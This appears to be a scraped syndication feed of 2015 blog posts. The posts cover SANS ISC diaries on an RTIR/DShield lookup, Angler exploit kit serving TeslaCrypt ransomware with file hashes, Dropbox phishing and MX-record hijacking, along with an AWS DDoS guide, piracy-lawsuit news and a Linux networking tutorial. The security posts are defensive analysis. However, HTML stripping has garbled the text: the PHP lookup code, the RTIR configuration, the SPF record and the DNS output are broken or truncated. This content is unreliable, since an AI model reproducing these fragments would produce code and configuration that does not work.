    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    A few days ago, Tom wrote a diary(1) about RTIR(2) and itsREST API. He explained how the tool can be fulfilled with external data. Being aDShield contributor for years (I submitmy firewall logs), I like to search for IP addresses information in the DShield database. By default,RTIRextracts IP addresses from tickets and has an interface to query services like WHOIS servers, to perform a traceroute or to query any third-party website.”>beingextremely configurable, why not extend itto query the DShield database using the ISC API(3)!

    If IP addresses can be queriedvia theURL, dont do this.First of allfor performance reasons butthe page cannot be displayed in an iframe(thats the case in RTIR)because it sets the X-Frame-Options to SAMEORIGIN”>

    Resultsarereturned in XML. To integrate DShield lookups into RTIR, follow this procedure.

    1. Create a new page called isc_ipinfo.phpin your Apache server running RTIR (or any available HTTP server). This page will receive the IP address, query the DShield API and reformat (basically)”>?php
    $ip = $_GET[ip
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
    echo Invalid IP address!

    $d = simplexml_load_file(
    trtd align=rightbIP Address:/b/tdtd?php echo $d- ?(a href= echo $ip ? target=_blankDetails/a)/td/tr
    trtd align=rightbNetwork:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbAS:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbAS Name:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbAS Size:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbCountry:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbCount:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbAttacks:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbMin Date:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbMax Date:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbLast Updated:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbAbuse Contact:/b/tdtd?php echo $d- ?/td/tr
    trtd align=rightbComment:/b/tdtd?php echo $d- ?/td/tr

    2. Edit your $RTIRHOME/etc/ and add the newservice in $RTIRIframeResearchToolConfig”>Set($RTIRIframeResearchToolConfig, {
    1 = { FriendlyName = SANS ISC IP Info, URL = http://xxxxxxxx/isc_ipinfo.php?ip=__SearchTerm__ },
    3 = { FriendlyName = Google, URL = },
    4 = { FriendlyName = CVE, URL =},
    5 = { FriendlyName =, URL =},
    6 = { FriendlyName = McAfee SiteAdvisor, URL =},
    7 = { FriendlyName = BFK DNS Logger, URL =” />

    Its also easy to create new portlets to be used in dashboards. As a bonus, lets display the ISC Infocon status in a RTIR dashboard.

    1. Create the new portlet in $RTIRHOME/local/html/Elements. Lets call it InfoconStatus”>|/Widgets/TitleBox, title = loc(SANS ISC Status)
    img src= alt=SANS ISC Infocon Status
    /”>Set(@RTIR_HomepageComponents, qw(
    ” />


    Xavier Mertens
    ISC Handler – Freelance Security Consultant

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    AWS Security Blog: How to Help Prepare for DDoS Attacks by Reducing Your Attack Surface

    This post was syndicated from: AWS Security Blog and was written by: Jeffrey Lyon. Original post: at AWS Security Blog

    Distributed denial of service (DDoS) attacks are sometimes used by malicious actors in an attempt to flood a network, system, or application with more traffic, connections, or requests than it can handle. Not surprisingly, customers often ask us how we can help them protect their applications against these types of attacks. To help you optimize for availability, AWS provides best practices that allow you to use the scale of AWS to build a DDoS-resilient architecture. These best practices are discussed in depth in the whitepaper, AWS Best Practices for DDoS Resiliency, which also includes reference architecture to help you better prepare for DDoS attacks and protect the availability of your application.

    It is important to minimize the opportunities an attacker has to target your applications. In the whitepaper, we refer to this as reducing your attack surface. For DDoS attacks, this means restricting the type of traffic that can reach your applications. For example, if you’re building a simple web application, you might only need to expose TCP ports 80 and 443 to the Internet. This presents an opportunity to block traffic from many common DDoS attack vectors that do not communicate on the same port or protocol as your application.

    In this blog post, we will show you how to use Amazon Virtual Private Cloud (VPC) to control access to your applications and minimize public entry points by configuring security groups and network access control lists (ACLs). This is just one of several best practices you should consider when building a DDoS-resilient architecture.

    Common DDoS attacks

    Before diving into a discussion about configuring Amazon VPC, it is important to understand DDoS attack vectors and how minimizing your attack surface can often prevent malicious traffic from reaching your applications. The most common class of DDoS attack is a reflection attack, which is also the most likely to produce a volume of traffic capable of congesting network interfaces and inhibiting legitimate traffic. To launch a reflection attack, the attacker will first scan the Internet for servers hosting User Datagram Protocol (UDP) services such as Simple Service Discovery Protocol (SSDP), Domain Name System (DNS), Network Time Protocol (NTP), and Simple Network Management Protocol (SNMP). Depending on their configuration, these services will often send a response that is many times larger than the initial request. This allows an attacker to send a large volume of small requests with a spoofed source address, resulting in responses that are sometimes tens or even hundreds of times larger. These responses are sent to the spoofed source, which is the target of the DDoS attack.

    The following diagram details how an attacker can use spoofed requests to elicit an amplified response, resulting in a DDoS attack against the victim.

    Figure 1. Distributed reflection denial of service attack

    Configuring security groups

    Reflection attacks allow an attacker to source large volumes of traffic from anywhere in the world using common UDP services. Thankfully, these attacks are also some of the easiest to detect and in many cases can be mitigated by configuring security groups in Amazon VPC. This allows you to control inbound and outbound traffic to your instances by specifically allowing communication only on the ports and protocols required for your applications. Access to any other port or protocol is automatically denied.

    The following diagram provides reference architecture for the configuration of Amazon VPC using the example web application mentioned previously in this post. For more information, see Security Groups for Your VPC.

    Figure 2. Reference architecture with Amazon VPC configuration

    In this reference architecture, we use Amazon VPC configured with a DMZ public subnet and two private subnets. This allows us to create security groups that will permit communication with users and administrators via the Internet, and to create separate security groups for internal resources that are only accessible from the DMZ. For more information about creating and routing subnets in your VPC, see Your VPC and Subnets.

    SSH bastion security group

    The SSH bastion is a single Amazon EC2 instance used to provide secure administrator access and hosting only a Secure Shell (SSH) service. This allows the administrator to connect to TCP port 22 from the Internet or a specified range of Internet addresses. After connecting to the SSH bastion, the administrator can then connect to the web application server and MySQL database server instances. In case of a DDoS attack against this port, only the SSH service would be impacted. This prevents an attacker from using this port to impact the availability of your web application. To minimize the possibility of unauthorized access, only your network’s public IP range should be allowed to communicate with the SSH bastion security group. The following table provides an example of rules you can use to configure the SSH bastion security group. 

    ELB security group

    Elastic Load Balancing (ELB) allows you to achieve greater fault tolerance by automatically routing inbound traffic across multiple Amazon EC2 instances. It also allows you to reduce your attack surface by receiving requests on behalf of your web application and automatically scaling to handle capacity demands. Additionally, ELB is designed to pass only well-formed connections to your web application on ports and protocols that you specify. This provides an additional layer of DDoS resiliency. To allow users to access your web application through an ELB, we will set up a security group that accepts only TCP port 80 and 443 from the Internet and is able to distribute these requests to EC2 instances in the web application server security group. The following table provides an example of rules you can use to configure the ELB security group. 

    NAT security group

    Because the web application server and MySQL database server in this example are hosted on instances with private subnets, they do not have a route either directly in from or out to the Internet. Though this is not required to serve content to users via ELB, it may be desirable to allow instances to connect to the Internet for software updates. To allow the EC2 instances hosting the web and database services to access the Internet, we will create a network address translation (NAT) instance inside its own security group. With a NAT instance, you can securely route traffic from private subnets out to the Internet, while denying any inbound connectivity from the Internet. For more information, see NAT Instances.

    Web application server security group

    This security group contains all EC2 instances that serve content on behalf of the web application. These EC2 instances will accept web application requests only from the ELB. In an effort to minimize the attack surface, these instances are assigned only private IP addresses from the VPC subnet address range, which prevents them from being accessed directly via the Internet. Instead, we will configure the web application server security group to permit only TCP port 80 and 443 traffic from the ELB security group and TCP port 22 from the SSH bastion security group (for administrator access). The following table provides an example of rules you can use to configure the web application server security group.

    MySQL database server security group

    Similarly, we want to ensure that the MySQL database server is only accessible from the EC2 instances hosting the web application. To achieve this, we assign MySQL database server instances private IP addresses from the back-end private subnet IP address range and configure the MySQL database server security group to allow TCP port 3306 connections only from EC2 instances in the web application server security group. The following table provides an example of rules you can use to configure the MySQL database server security group.

    Configuring network ACLs

    Network ACLs provide an additional layer of defense for your VPC by allowing you to create stateless allow and deny rules that are processed in numeric order, much like a traditional firewall. This is useful for allowing or denying traffic at a subnet level, as opposed to security groups that allow traffic at an EC2 instance level. For example, if you have identified Internet IP addresses or ranges that are unwanted or potentially abusive, you can block them from reaching your application with a deny rule. You can decide whether to create rules that target an entire IP subnet or an individual IP address. The following table is an example of a custom network ACL that complements the security groups discussed earlier in this post. This can be applied to the public subnet. For more information, see Network ACLs. (For more information about how to select the appropriate ephemeral port range [from 1024-65535] in the network ACL, see Ephemeral Ports.)

    Other best practices to consider

    Configuring security groups and network ACLs in Amazon VPC is an effective tool to help reduce the attack surface of your applications. The approaches may seem similar, but each has an important role in surface area reduction. This is especially important in a DDoS context because security groups allow you to define the traffic that will be allowed access to resources within your applications, and network ACLs allow you to define the port, protocol, and source of traffic that should be explicitly denied at the subnet level. Now that you’ve configured two key security features of VPC, you should consider other components of your DDoS-resilient architecture, such as monitoring with Amazon CloudWatch and scaling with Amazon CloudFront, Amazon Route 53, Elastic Load Balancing, and Auto Scaling.

    I hope that this blog post will help you build more secure applications on AWS. If you have any questions about how to reduce your attack surface with Amazon VPC, please post a comment below.

    – Jeffrey Lyon, AWS Edge Services

    TorrentFreak: Aussie Piracy Notices Delayed But Lawsuits Are Coming

    This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

    warningAfter years of wrangling, on September 1, 2015, Australian ISPs will take the historic step of implementing a new anti-piracy scheme, one that will see Internet users issued with escalating warning notices designed to bring a halt to their pirating ways.

    Well, at least that was the plan when a draft anti-piracy code was laid down in April. Almost predictably, however, that deadline will come and go without event.

    The problem – and this will come as zero surprise to those who have followed this process for the past several years – is one related to costs.

    Money, money, money

    Since the beginning of negotiations, rightsholders have insisted that ISPs should pick up varying percentages of the bills incurred when sending piracy warnings to their subscribers. Equally, ISPs have insisted that if rightsholders want notices sent out, they should be the ones to pay.

    This dispute has brought the parties to deadlock several times during years of negotiations, and has derailed talks completely more than once, most recently in 2012. However, this year – with the government breathing down their necks – rightsholders and ISPs agreed most aspects of how the notices would be handled, but left the issue of costs until another day.

    That day has now arrived and still there are disputes. With the launch of the scheme supposedly just next week, ITNews reports that during an industry briefing this morning it was revealed that the parties are still arguing over who will pay for the 200,000 notices set to go out in the scheme’s first year.

    For their part, rightsholders think that the ISPs should help with the costs, in part because it is their customers carrying out the infringements. They also believe that if ISPs foot part of the bill, they will be keen to keep costs down.

    On the other hand, ISPs insist that if the notices prove effective in cutting piracy and driving up sales, rightsholders will get the benefit so should therefore pay the bill.

    Countering, rightsholders also point to the bigger picture, one in which ISPs are increasingly becoming the conduit for providing entertainment content to subscribers.

    “As ISPs increasingly become content providers, the business imperative to make sure people are valuing those services will become more and more important [to them],” says Foxtel director of corporate affairs Bruce Meagher.

    So how much is the whole thing likely to cost? According to figures obtained by ITNews, there is dispute there too.

    Too expensive to reduce piracy?

    ISPs say that the bill could amount to $27 per IP address targeted, while rightsholders suggest that the figure would be more like $6. A report commissioned by the parties earlier this year concluded that the cost will be closer to the $27 suggested by the ISPs.

    That cost is too high. As previously seen in New Zealand, “strikes” schemes with high costs are rendered pointless.

    “We saw that in New Zealand where the government mandated $25 per IP address, and no-one used the scheme,” Meagher says. “We’ve got to work out a way of setting a price that encourages the scheme to be used.”

    If in doubt, send the lawyers out

    But even though agreement could take a while to reach, there are those in the entertainment industry already looking ahead to what might happen once people start receiving warning notices. Speaking with SBS, Village Roadshow co-founder Graham Burke says that if the notices don’t prove enough of a deterrent, legal action will be the next step.

    “Yes, [piracy] is wrong. [Downloaders] have been warned, and sent notices that they’re doing the wrong thing. Yes we will sue people,” Burke said.

    Asked by interviewer Marc Fennell whether there is any fear of a backlash should the industry start suing single parents and grandmothers (as they have done in the past), Burke dismissed the concerns.

    “It was really just a couple of instances of a bad news day, where [the press] picked up a couple of instances of a single pregnant mother,” he said.

    But would just a couple of those stories prove damaging?

    “Not if it’s seen in the context that it is theft, and they have been doing the wrong thing, and they’ve been sent appropriate notices, and they’ve been dealt with accordingly. We’re certainly not going to be seeking out single pregnant mothers,” Burke said.

    Confronted with the likelihood that some people will simply hide their activities by using a VPN, Burke played down the fears.

    “I think that if people are appealed to in the right way, they’ll react appropriately,” he said.

    Site blocking

    Finally, after site-blocking legislation was passed earlier this year, Burke has now confirmed that his company will take action soon.

    “We are going through the legal preparation at this stage and will be ready in October to go to the courts and ask them to block sites,” he concludes.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    SANS Internet Storm Center, InfoCON: green: Actor that tried Neutrino exploit kit now back to Angler, (Wed, Aug 26th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


    Last week, we saw the group behind a significant amount of Angler exploit kit (EK) switch to Neutrino EK [1]. We didnt know if the change was permanent, and I also noted that criminal groups using EKs have quickly changed tactics in the past. This week, the group is back to Angler EK.

    The past few days, Ive noticed several examples Angler EK pushing TeslaCrypt 2.0 ransomware. For todays diary, well look at four examples of Angler EK on Tuesday 2015-08-25 from 16:42 to 18:24 UTC. All examples delivered the same sample of TeslaCrypt 2.0 ransomware.

    TeslaCrypt 2.0

    TeslaCrypt is a recent familyofransomware that first appeared early this year. Its beenknown to mimic CryptoLocker, and weve seen it use the names TelsaCrypt and AlphaCrypt in previous infections [2,3,4]. According to Kaspersky Lab, version 2.0 of TeslaCrypt usesthe same type of decrypt instructions as CryptoWall [5]. however, artifacts and traffic from the infected host reveal this is actuallyTeslaCrypt.

    Kafeine from Malware Dont Need Coffee first tweeted about the new ransomware on 2015-07-13 [6]. The next day on, Kaspersky Lab released details on this most recent version of TeslaCrypt [5].

    I saw my first sample of TeslaCrypt 2.0 sent from Nuclear EK on 2015-07-20 [7]. Most TeslaCrypt 2.0 samples weve run across since then were delivered by however, we havent seen a great deal of it. Until recently, most of the ransomware delivered by Angler EK was CryptoWall 3.0. however, this time the iframes pointed to Angler EK. In most cases, the iframe led directly to the Angler EK landing page. ” />
    Shown above: From the third example, the” />
    Shown above: From the fourth example, theiframe pointing to an Angler EK landing page.

    Looking at the traffic in Wireshark, we find two different IPs and four different domains from the four Angler infections during a 1 hour and 42 minute time span.”>”>. Although Angler EK sends its payload encrypted, I was able to grab a decrypted copy from an infected host before it deleted itself.

    • File name: 2015-08-25-Angler-EK-payload-TeslaCrypt-2.0.exe
    • File size: 346.9 KB (355,239 bytes)
    • MD5 hash: 4321192c28109be890decfa5657fb3b3
    • SHA1 hash: 352f81f9f7c1dcdb5dbfe9bee0faa82edba043b9
    • SHA256 hash: 838f89a2eead1cfdf066010c6862005cd3ae15cf8dc5190848b564352c412cfa
    • Detection ratio: 3 / 49
    • First submission: 2015-08-25 19:51:01 UTC
    • Virus Total analysis: link
    • analysis: link
    • analysis: link

    The following post-infection traffic was seenfrom the four infected hosts:

    • – TCP port 80 (http) – IP address check
    • – TCP port 80 (http)- – post-infection callback
    • – TCP port 80 (http) – – post-infection callback

    Malwr.coms analysis of the payload reveals additional IP addresses and hosts:

    • – TCP port 80 (http) –
    • – TCP port 80 (http) –
    • – TCP port 80 (http) –
    • – TCP port 80 (http) –
    • – TCP port 443 (encrypted) –
    • – TCP port 443 (encrypted) –

    Snort-based alerts on the traffic

    I played back the pcap on Security Onion using Suricata with the EmergingThreats (ET) and ET Pro rule sets. The results show alerts for Angler EK and AlphaCrypt. The AlphaCrypt alerts triggered on callback traffic from TeslaCrypt 2.0. ” />
    Shown above: Got a captcha when trying one of the URLs” />
    Shown above: Final decrypt instructions with a bitcoin address for the ransom payment.

    Final words

    On the same cloned host with the same malware, we saw a different URLfor the decrypt instructions each time. Every infection resulted in a different bitcoin address for the ransom payment, even though it was the same sample infecting the same cloned host.

    We continue to see EKs used by this and other criminal groups to spread malware. Although we havent seen as much CryptoWall this week, the situation could easily change in a few days time.

    Traffic and malware for thisdiary are listed below:

    • A zip archive of four pcap files with the infection traffic from Tuesday 2015-08-25 is available here. “>(4.14″>MB)
    • A zip archive of the malware and other artifacts is available here. “>(957 KB)

    The zip archive for the malware is password-protected with the standard password. If you dont know it, email and ask.

    Brad Duncan
    Security Researcher at Rackspace
    Blog: – Twitter: @malware_traffic



    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: Dropbox Phishing via Compromised WordPress Site, (Tue, Aug 25th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    I got a couple of emails today notifying me of a Compulsory Email Account Update for my Dropbox account. The e-mails do overall mimic the Dropbox look and feel, and use as a From” />

    First of all, the email is sent from The domain is owned by an e-mail marketing service, and it publishes SPF records. The IP address the e-mail was sent from ( is not in”>spf2.0/pra,mfrom ~all
    v=spf1 ip4: ip4: ?all

    But note the ?all part, which specifies that for all IPs not listed, the result is neutral which usually means the e-mail is accepted. So in the end, it kind of invalidates the SPF record, but a spam filter could still include the fact in its score.

    Moving on to our spam filter. Our not well tuned spamassassinimplementation gave it a score of 33! URLs listed in the email are blacklisted for example. The e-mail agent (Outlook) does not match the layout of the MIME message.

    Should the email arrive in your inbox, you may be tempted to click on it. The attackerdid not attempt to obfuscate the URL. Your browser will be directed straight to a .vn (Vietnam) site. The site is already blacklisted and your browser is likely going to warn you about the site. It appears, based on the URL, that the attacker compromised a WordPress site to upload a simple phishing form. The form will offer the victim a number of different e-mail services to chose from, in order to verify the users credentials. No matter which e-mail address / password is used, the victim will be directed to a google” />

    So there are many ways how a user will NOT fall for this email. But why do users still click even on simple emails like this?

    – These e-mails tend to be most successful very early on in their live cycle, before blacklists pick up on them (I looked at the email a couple hours after it arrived in my inbox)
    – Phishing is a numbers game. Out of thousands of phishing e-mails, only a few users will click and even less will enter their credentials. But then again, sending these emails is cheap
    – Do not assume that all attackers are succesful and rolling in cash made from their illicit ventures. Just like other criminal undertakings, there are a few who make money, and an awful lot who live in their moms basement and dream of making money but dont have the skills to do it.

    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    TorrentFreak: 75,000 Popcorn Time Users in Crosshairs of Anti-Piracy Group

    This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

    Less than 18 months since its original launch in 2014 and the controversial Popcorn Time software is still making headlines. The application’s colorful and easy to use interface has proven a hit with users and now anti-piracy groups in the United States and Europe are fighting back.

    Last month Norwegian anti-piracy group Rettighets Alliansen (Rights Alliance) blamed Popcorn Time for a piracy explosion in the country and warned that it was monitoring pirates. More information is now being made available.

    Norway has a population of just over 5.1m and it’s estimated that around 750,000 obtain video from illegal sources. However, it’s now being claimed that a third of those – 250,000 – are using Popcorn Time on a weekly basis. Rights Alliance says it has been watching them closely.

    According to Rights Alliance chief Willy Johansen, his organization is now in possession of database containing information on between 50,000 and 75,000 suspected Popcorn Time pirates. The only question now is what the group will decide to do with the data.

    “We are sitting today with a record of some users of [Popcorn Time] in Norway. These are records we can lawfully use, and it could be that someone gets a little surprise in the mail in the form of a letter. It’s probable that something will happen in the fall,” Johansen says.

    If Rights Alliance follows through with its threats it will mark the first time that regular users have been targeted since copyright law was tweaked two years ago.

    In 2013 a change in legislation enabled copyright holders to apply to the government for permission (granted to the Hollywood in Nov 2013) to scan file-sharing networks for infringements. Other changes mean that harvested IP addresses can now be converted to real-life identities with the help of the courts and ISPs.

    But according to Bjørgulv Vinje Borgundvåg at the Ministry of Culture, yet more changes could be on the way.

    “Two years ago, Parliament adopted an amendment providing Rights Alliance and the people who own these intellectual property rights to take action, and to ask the court for compensation for abuse of their intellectual property. We are now considering making further legislative changes to protect intellectual property from being abused online,” Borgundvåg told NRK.

    In the meantime, however, groups like Rights Alliance, the MPA and their Hollywood affiliates have to deal with the law as it stands today. They have been granted permission to harvest IP address information by the country’s Data Inspectorate but obtaining the identities behind those addresses will require further work.

    “In relation to the legislation we have in Norway, Rights Alliance is fully entitled to collect IP addresses of Popcorn Time users. This is not problematic as we see it,” explains Inspectorate Director Bjorn Erik Thon

    “Rights Alliance may collect IP addresses, but to find out the identities of who is behind them requires a trial,” he notes.

    However, according to law professor Olav Torvund, even getting that far is likely to provide headaches.

    “This is not straightforward,” Torvund explains.

    “Rights Alliance must determine which IP addresses have been used. Most Norwegian users have [regularly changing] dynamic IP addresses which do not necessarily identify the user.”

    And even if users are successfully identified, legal problems persist.

    “One must have acted intentionally or negligently and known or understood that material is being shared with others [when using Popcorn Time],” Torvund says

    “It is not necessarily so easy to prove. In other words, it’s a long way to the finish and there are several problems to overcome.”

    While Rights Alliance are known to go after both site owners and users elsewhere in Scandinavia (there were arrests in Denmark last week), it seems unlikely that they will take a troll-like stance with Popcorn Time users in the way that the makers of Dallas Buyers Club have.

    Still, the fall isn’t too far away, so time will soon tell.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    TorrentFreak: Dallas Buyers Club Wants to Interrogate Suspected Pirates

    This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

    dallasThe makers of Dallas Buyers Club have sued hundreds of BitTorrent users over the past year.

    Many of these cases end up being settled for an undisclosed amount. This usually happens after the filmmakers obtain the identity of the Internet account holder believed to have pirated the movie.

    Not all alleged downloaders are eager to pay up though. In fact, many don’t respond to the settlement letters they receive or claim that someone else must have downloaded the film using their connection.

    In a recent court filing (pdf) at a Washington District Court the filmmakers explain the efforts they undertake to ensure that the right person is accused. This includes gathering information from Facebook, LinkedIn and even Google Maps.

    “Google address mapping and county records were investigated to confirm ownership/rental status of and residence at the property associated with the IP address, as well as observe the physical makeup and layout of the house and neighborhood to anticipate possible claims that a wireless signal was highjacked by someone outside of the residence,” the filmmakers explain.

    The router security settings and download history of a specific connection are used as additional pieces of information to ensure that the alleged copyright infringements are systematic.

    “Further, given the standard security measures imposed by ISPs to prevent unauthorized use of an IP address, the volume of piracy demonstrated over the extended observation period could not be the result of someone driving by, a temporary house guest or a hacker sitting in a car on the street.”

    While the methods above are already quite invasive, Dallas Buyers Club now aims to take it up a notch.

    In order to pinpoint the true pirates the movie studio wants to depose 15 account holders. This means that they will have to testify under oath for up to two hours and face a grilling from the studio’s legal team.

    This is the first time that we’ve seen a request for a deposition in a Dallas Buyers Club case. Needless to say, a testimony under oath can be quite intimidating, and is highly unusual in these type of cases.

    The account holders of IP-addresses linked to the pirated downloads have already been identified by the ISP. However, they failed to respond to the movie studio or denied that they had shared the film illegally.

    Through a testimony under oath, the movie studio hopes to identify the true pirates, so they can be named in the lawsuit.

    “DBC believes that further discovery is warranted to confirm which of any possible occupants of the physical address assigned the infringing IP address is the proper Doe defendant to be named in the case,” they note.

    The filmmakers suspect that some of the subscribers are the actual infringers, but it’s possible that they’re covering for someone else, such as a roommate or spouse.

    “A subscriber should not be allowed to shield, immunize and anonymize those they allow to use their Internet service from liability for intentional torts. The subscriber is the single best and perhaps only source of information as to the responsible party using its IP address.”

    According to the filmmakers the depositions will result in a reduction of legal expenses while guaranteeing the anonymity of the defendants.

    However, more critical observers may also note that it is an optimal tool to pressure ISP subscribers who choose to ignore settlement requests and other threats.

    At the time of writing the court has yet to rule on the discovery request.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    TorrentFreak: Movie Studio Sues Popcorn Time Users In The U.S.

    This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

    cobblerOver the past several years hundreds of thousands of Internet subscribers have been sued in the United States for allegedly sharing copyrighted material, mostly video.

    The cases are generally targeted at “BitTorrent” users in general, not focusing on any client in particular.

    However, this week the makers of the 2014 comedy “The Cobbler” decided to single out Popcorn Time users.

    Popcorn Time also uses BitTorrent under the hood but unlike traditional clients it allows users to browse through a library of films and stream these from within the application.

    Popcorn Time is by no means private as users connect to public BitTorrent swarms, which makes it easy for monitoring firms and copyright holders to track down pirates.

    This also happened to 11 Popcorn Time users who allegedly viewed and shared “The Cobbler.” The makers of the movie filed a complaint (pdf) at a Oregon District Court requesting a subpoena to compel Comcast to hand over the personal details of the associated account holders.

    “Each defendant’s IP address has been observed and confirmed as both viewing and distributing plaintiff’s motion picture through Popcorn Time,” the complaint explains.

    The Popcorn Time defendants

    The reason for singling out Popcorn Time users is unclear. The same filmmakers have launched lawsuits against BitTorrent users before, but they may believe that the infringing image of Popcorn Time bolsters their case.

    “Popcorn Time exists for one purpose and one purpose only: to steal copyrighted content,” they write, adding that the defendants should have been well aware of this.

    The Popcorn Time website and application repeatedly informs users that its use may be against the law. For example, the Popcorn Time website has a clear warning on its homepage and in the FAQ.

    “Without a doubt, each user of Popcorn Time is provided multiple notices that they are downloading and installing software for the express purpose of committing theft and contributing the ability of others to commit theft by furthering the Bit Torrent piracy network,” the complaint explains.

    Popcorn Time warning

    The filmmakers demand a permanent injunction against the defendants ordering them to stop pirating their movies. In addition, they request statutory damages of up to $150,000.

    In reality, however, they are likely to approach the defendants for a settlement offer of a few thousands dollars, as is common in these type of “copyright troll” cases.

    The developers of the Popcorn Time app that was targeted inform TF that users are indeed repeatedly warned that using their application to download pirated films can lead to legal trouble.

    “Popcorn Time isn’t illegal. However, the use people make of the application can be illegal, depending on their country and local laws,” they tell TF.

    “You’d think with all our warnings, the anti-piracy laws, the explanations given in the media and the common sense, users would be aware of their actions by now. Pinning a a ‘Popcorn Time’ label over such a lawsuit seems a little inflated,” they add.

    The Court has yet to issue an order following the subpoena request. Based on previous cases the account holders connected to the 11 IP-addresses listed above can expect a settlement offer in the mail soon.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    SANS Internet Storm Center, InfoCON: green: Outsourcing critical infrastructure (such as DNS), (Wed, Aug 19th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    Migrating everything to cloud or various online services is becoming increasingly popular in last couple of years (and will probably not stop). However, leaving our most valuable jewels with someone else makes a lot of security people (me included) nervous.

    During some of the latest external penetration tests I noticed an increasing trend of companies moving some of their services to various cloud solutions or to their IN ANSWER SECTION: 1365 IN NS 1365 IN NS ADDITIONAL SECTION: 1366 IN A 9018 IN A

    Now what do we have here? Things look generally OK there are two DNS servers for our target domain, at two different hosting companies (or, for the sake of this article, we can pretend that they are at the target companys ISP).

    The problem here is that the trust for our most critical infrastructure now completely lays with the ISP (or a hosting company). Why is that a problem? Well remember all those attacks that happen when an account at a registrar gets hacked and domain information (including DNS servers) gets changed? The same thing applies here DNS servers are the key to our kingdom.

    I recently had to work on an incident that included such an attack where the NS records were modified silently by an attacker that got access to the hosting company. And that attack was very sneaky the attacker modified only selected DNS records: the MX records. So, for couple of hours during a business day, the attacker changed the MX records (only) to point to his SMTP servers. Those servers were configured just to relay e-mail (and additionally, a specific version of an SMTP server was used to prevent adding headers) to the real destination. This was a very simple Man-in-the-Middle attack that was, unfortunately, very successful for the attacker as he was able to collect and analyze absolutely all e-mail sent to the victim company. While he was not able to see the outgoing e-mails, just remember how many times youve seen people actually remove the original e-mail (or reply inline) when replying? This is indeed very rare these days although those older will remember that once upon a time it was part of netiquette.

    Lessons learned here? While outsourcing DNS servers is not necessarily a bad thing, be aware of the risks that come with it (and with cloud usage in general). For this particular case, depending on the business the target company is in, I most of the times recommend that the DNS servers, as critical infrastructure, are kept on premises and managed by local staff. This way, you decrease the risk of the hosting company getting pwned, or simply risk of a disgruntled employee at the hosting company.

    If you do decide to outsource DNS anyway, ask yourself first if you would detect the attack I mentioned? What controls do you have in place for detecting such an attack?
    Implementation of additional monitoring controls such as regularly checking your critical DNS records (such as NS, MX and possibly A records for critical names) can go a long way and is very inexpensive. For this particular case, SPF would help as well, but unfortunately the majority of servers will simply use SPF information for spam detection and only very rare MUAs will warn users when SPF records do not match the sending IP address.

    Have similar outsourcing war stories? Let us know!


    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License. Ruoho: Multiple Vulnerabilities in Pocket

    This post was syndicated from: and was written by: jake. Original post: at

    On his blog, Clint Ruoho reports on multiple vulnerabilities he found in the Pocket service that saves articles and other web content for reading later on a variety of devices. Pocket integration has been controversially added to Firefox recently, which is what drew his attention to the service. “The full output from server-status then was synced to my Android, and was visible when I switched from web to article view. Apache’s mod_status can provide a great deal of useful information, such as internal source and destination IP address, parameters of URLs currently being requested, and query parameters. For Pocket’s app, the URLs being requested include URLs being viewed by users of the Pocket application, as some of these requests are done as HTTP GETs.

    These details can be omitted by disabling ExtendedStatus in Apache. Most of Pocket’s backend servers had ExtendedStatus disabled, however it remained enabled on a small subset, which would provide meaningful information to attackers.” He was able to get more information, such as the contents of /etc/passwd on Pocket’s Amazon EC2 servers.
    (Thanks to Scott Bronson and Pete Flugstad.)

    Linux How-Tos and Linux Tutorials: Replacing ifconfig with ip

    This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

    If you’ve been around Linux long enough, you know tools come and go. This was assumed to be the case back around 2009 when the debian-devel mailing list announced plans on deprecating the net-tools package due to lack of maintenance. It is now 2015 and net-tools is still around. In fact, as of Ubuntu 14.10, you can still issue the ifconfig command to manage your network configuration.

    However, in some instances (e.g., Ubuntu Docker container), the net-tools suite isn’t installed by default. This means the ifconfig command isn’t available. Although you can install net-tools with the command

    sudo apt-get install net-tools

    it is most often recommended to move forward with the command that has replaced ifconfig. That command is ip, and it does a great job of stepping in for the out-of-date ifconfig.

    Thing is, ip is not a drop-in replacement for ifconfig. There are differences in the structure of the commands. Even with these differences, both commands are used for similar purposes. In fact, ip can do the following:

    • Discover which interfaces are configured on a system

    • Query the status of a network interface

    • Configure the network interfaces (including local loop-back, and Ethernet)

    • Bring an interface up or down

